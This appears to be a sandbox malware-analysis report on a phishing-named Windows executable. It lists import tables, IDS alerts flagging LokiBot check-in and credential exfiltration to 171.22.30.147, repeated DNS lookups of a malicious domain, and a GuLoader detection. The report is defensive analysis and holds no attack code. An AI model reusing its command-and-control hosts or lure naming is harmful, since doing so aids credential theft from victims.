                KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.11.20171.22.30.14749853802025381 03/17/23-14:12:55.965496TCP2025381ET TROJAN LokiBot Checkin4985380192.168.11.20171.22.30.147
                192.168.11.20171.22.30.14749853802024317 03/17/23-14:12:55.965496TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24985380192.168.11.20171.22.30.147
                192.168.11.20171.22.30.14749853802024312 03/17/23-14:12:55.965496TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14985380192.168.11.20171.22.30.147
                192.168.11.20171.22.30.14749853802021641 03/17/23-14:12:55.965496TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.11.20171.22.30.147
                192.168.11.20171.22.30.14749853802825766 03/17/23-14:12:55.965496TCP2825766ETPRO TROJAN LokiBot Checkin M24985380192.168.11.20171.22.30.147
                TimestampSource PortDest PortSource IPDest IP
                Mar 17, 2023 14:12:54.334647894 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.334741116 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.335037947 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.364645958 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.364736080 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.403652906 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.403784037 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.403872967 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.463743925 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.464905024 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.465080976 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.469958067 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.512496948 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.722651005 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.722851992 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.722944975 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.723097086 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.723146915 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.723378897 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.723397017 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.723440886 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.723583937 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.723620892 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.723774910 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.723835945 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.723886967 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.723969936 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.724070072 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.724108934 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.724132061 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.724242926 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.724431038 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.724466085 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.724800110 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.835608006 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.835864067 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.835886955 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.835967064 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.836069107 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.836235046 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.836235046 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.836317062 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.836342096 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.836584091 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.838026047 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.838287115 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.838385105 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.838531017 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.838639975 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.838671923 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.838726997 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.838767052 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.838920116 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.838956118 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.839015961 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.839242935 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.839242935 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.839294910 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.839598894 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.843415022 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.843616962 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.843703985 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.843882084 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.843987942 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.844014883 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.844042063 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.844238997 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.844238997 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.844259977 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.844345093 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.844582081 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.844583035 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.844613075 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.844640970 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.844780922 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.844782114 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.844886065 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.845119953 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.951216936 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.951428890 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.951525927 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.951684952 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.951800108 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.951807022 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.951862097 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.951894045 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.952091932 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.952095985 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.952095985 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.952202082 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.952281952 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.952439070 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.952471018 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.952512026 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.952641010 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.952686071 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.952850103 CET44349852188.114.96.3192.168.11.20
                Mar 17, 2023 14:12:54.953066111 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.953066111 CET49852443192.168.11.20188.114.96.3
                Mar 17, 2023 14:12:54.953099966 CET44349852188.114.96.3192.168.11.20
                TimestampSource PortDest PortSource IPDest IP
                Mar 17, 2023 14:11:08.672599077 CET5216253192.168.11.209.9.9.9
                Mar 17, 2023 14:11:08.676314116 CET53521629.9.9.9192.168.11.20
                Mar 17, 2023 14:11:13.753829956 CET5224453192.168.11.209.9.9.9
                Mar 17, 2023 14:11:13.766824961 CET53522449.9.9.9192.168.11.20
                Mar 17, 2023 14:11:18.846615076 CET5774353192.168.11.209.9.9.9
                Mar 17, 2023 14:11:18.850532055 CET53577439.9.9.9192.168.11.20
                Mar 17, 2023 14:11:23.924415112 CET6183453192.168.11.209.9.9.9
                Mar 17, 2023 14:11:23.927993059 CET53618349.9.9.9192.168.11.20
                Mar 17, 2023 14:11:27.984611988 CET5664453192.168.11.209.9.9.9
                Mar 17, 2023 14:11:27.989150047 CET53566449.9.9.9192.168.11.20
                Mar 17, 2023 14:11:33.063162088 CET5861753192.168.11.209.9.9.9
                Mar 17, 2023 14:11:33.070621014 CET53586179.9.9.9192.168.11.20
                Mar 17, 2023 14:11:38.139564991 CET6007053192.168.11.209.9.9.9
                Mar 17, 2023 14:11:38.143363953 CET53600709.9.9.9192.168.11.20
                Mar 17, 2023 14:11:43.215730906 CET5766453192.168.11.209.9.9.9
                Mar 17, 2023 14:11:43.218975067 CET53576649.9.9.9192.168.11.20
                Mar 17, 2023 14:11:48.295723915 CET5140553192.168.11.209.9.9.9
                Mar 17, 2023 14:11:48.302275896 CET53514059.9.9.9192.168.11.20
                Mar 17, 2023 14:11:53.369611025 CET5602153192.168.11.209.9.9.9
                Mar 17, 2023 14:11:53.373475075 CET53560219.9.9.9192.168.11.20
                Mar 17, 2023 14:11:58.447398901 CET5485353192.168.11.209.9.9.9
                Mar 17, 2023 14:11:58.451924086 CET53548539.9.9.9192.168.11.20
                Mar 17, 2023 14:12:03.524935007 CET6483053192.168.11.209.9.9.9
                Mar 17, 2023 14:12:03.528922081 CET53648309.9.9.9192.168.11.20
                Mar 17, 2023 14:12:08.600559950 CET5204353192.168.11.209.9.9.9
                Mar 17, 2023 14:12:08.611625910 CET53520439.9.9.9192.168.11.20
                Mar 17, 2023 14:12:13.681356907 CET6540853192.168.11.209.9.9.9
                Mar 17, 2023 14:12:13.685094118 CET53654089.9.9.9192.168.11.20
                Mar 17, 2023 14:12:18.755645990 CET5946653192.168.11.209.9.9.9
                Mar 17, 2023 14:12:18.761109114 CET53594669.9.9.9192.168.11.20
                Mar 17, 2023 14:12:23.831711054 CET6277553192.168.11.209.9.9.9
                Mar 17, 2023 14:12:23.835189104 CET53627759.9.9.9192.168.11.20
                Mar 17, 2023 14:12:28.908698082 CET5425653192.168.11.209.9.9.9
                Mar 17, 2023 14:12:28.912781954 CET53542569.9.9.9192.168.11.20
                Mar 17, 2023 14:12:32.970323086 CET5921153192.168.11.209.9.9.9
                Mar 17, 2023 14:12:32.974494934 CET53592119.9.9.9192.168.11.20
                Mar 17, 2023 14:12:38.047481060 CET5821453192.168.11.209.9.9.9
                Mar 17, 2023 14:12:38.051160097 CET53582149.9.9.9192.168.11.20
                Mar 17, 2023 14:12:43.125505924 CET6330953192.168.11.209.9.9.9
                Mar 17, 2023 14:12:43.129215956 CET53633099.9.9.9192.168.11.20
                Mar 17, 2023 14:12:48.201524019 CET5219053192.168.11.209.9.9.9
                Mar 17, 2023 14:12:48.206408024 CET53521909.9.9.9192.168.11.20
                Mar 17, 2023 14:12:53.279522896 CET5035553192.168.11.209.9.9.9
                Mar 17, 2023 14:12:54.292489052 CET5035553192.168.11.201.1.1.1
                Mar 17, 2023 14:12:54.327683926 CET53503551.1.1.1192.168.11.20
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Mar 17, 2023 14:11:08.672599077 CET192.168.11.209.9.9.90x610aStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:13.753829956 CET192.168.11.209.9.9.90x6577Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:18.846615076 CET192.168.11.209.9.9.90x83acStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:23.924415112 CET192.168.11.209.9.9.90x7c96Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:27.984611988 CET192.168.11.209.9.9.90x4c5Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:33.063162088 CET192.168.11.209.9.9.90xf35dStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:38.139564991 CET192.168.11.209.9.9.90xc2ddStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:43.215730906 CET192.168.11.209.9.9.90x7d97Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:48.295723915 CET192.168.11.209.9.9.90x58deStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:53.369611025 CET192.168.11.209.9.9.90x844Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:58.447398901 CET192.168.11.209.9.9.90x6828Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:03.524935007 CET192.168.11.209.9.9.90x4ba8Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:08.600559950 CET192.168.11.209.9.9.90xa129Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:13.681356907 CET192.168.11.209.9.9.90xd431Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:18.755645990 CET192.168.11.209.9.9.90xe51cStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:23.831711054 CET192.168.11.209.9.9.90xd17aStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:28.908698082 CET192.168.11.209.9.9.90x3bf9Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:32.970323086 CET192.168.11.209.9.9.90x4a1fStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:38.047481060 CET192.168.11.209.9.9.90x511eStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:43.125505924 CET192.168.11.209.9.9.90xa387Standard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:48.201524019 CET192.168.11.209.9.9.90x7aaStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:53.279522896 CET192.168.11.209.9.9.90x379eStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:54.292489052 CET192.168.11.201.1.1.10x379eStandard query (0)zed-unusual-activity-com.veldaeffertz.mlA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Mar 17, 2023 14:11:08.676314116 CET9.9.9.9192.168.11.200x610aName error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:13.766824961 CET9.9.9.9192.168.11.200x6577Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:18.850532055 CET9.9.9.9192.168.11.200x83acName error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:23.927993059 CET9.9.9.9192.168.11.200x7c96Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:27.989150047 CET9.9.9.9192.168.11.200x4c5Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:33.070621014 CET9.9.9.9192.168.11.200xf35dName error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:38.143363953 CET9.9.9.9192.168.11.200xc2ddName error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:43.218975067 CET9.9.9.9192.168.11.200x7d97Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:48.302275896 CET9.9.9.9192.168.11.200x58deName error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:53.373475075 CET9.9.9.9192.168.11.200x844Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:11:58.451924086 CET9.9.9.9192.168.11.200x6828Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:03.528922081 CET9.9.9.9192.168.11.200x4ba8Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:08.611625910 CET9.9.9.9192.168.11.200xa129Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:13.685094118 CET9.9.9.9192.168.11.200xd431Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:18.761109114 CET9.9.9.9192.168.11.200xe51cName error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:23.835189104 CET9.9.9.9192.168.11.200xd17aName error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:28.912781954 CET9.9.9.9192.168.11.200x3bf9Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:32.974494934 CET9.9.9.9192.168.11.200x4a1fName error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:38.051160097 CET9.9.9.9192.168.11.200x511eName error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:43.129215956 CET9.9.9.9192.168.11.200xa387Name error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:48.206408024 CET9.9.9.9192.168.11.200x7aaName error (3)zed-unusual-activity-com.veldaeffertz.mlnonenoneA (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:54.327683926 CET1.1.1.1192.168.11.200x379eNo error (0)zed-unusual-activity-com.veldaeffertz.ml188.114.96.3A (IP address)IN (0x0001)false
                Mar 17, 2023 14:12:54.327683926 CET1.1.1.1192.168.11.200x379eNo error (0)zed-unusual-activity-com.veldaeffertz.ml188.114.97.3A (IP address)IN (0x0001)false
                • zed-unusual-activity-com.veldaeffertz.ml
                • 171.22.30.147

                Click to jump to process

                Target ID:1
                Start time:14:10:12
                Start date:17/03/2023
                Path:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                Imagebase:0x400000
                File size:329072 bytes
                MD5 hash:06BF8620598B674FC3506A2844D42D65
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.52072378521.0000000003DE8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low

                Target ID:5
                Start time:14:10:56
                Start date:17/03/2023
                Path:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
                Imagebase:0x400000
                File size:329072 bytes
                MD5 hash:06BF8620598B674FC3506A2844D42D65
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:8
                Start time:14:12:57
                Start date:17/03/2023
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 2000
                Imagebase:0x4e0000
                File size:482640 bytes
                MD5 hash:40A149513D721F096DDF50C04DA2F01F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                No disassembly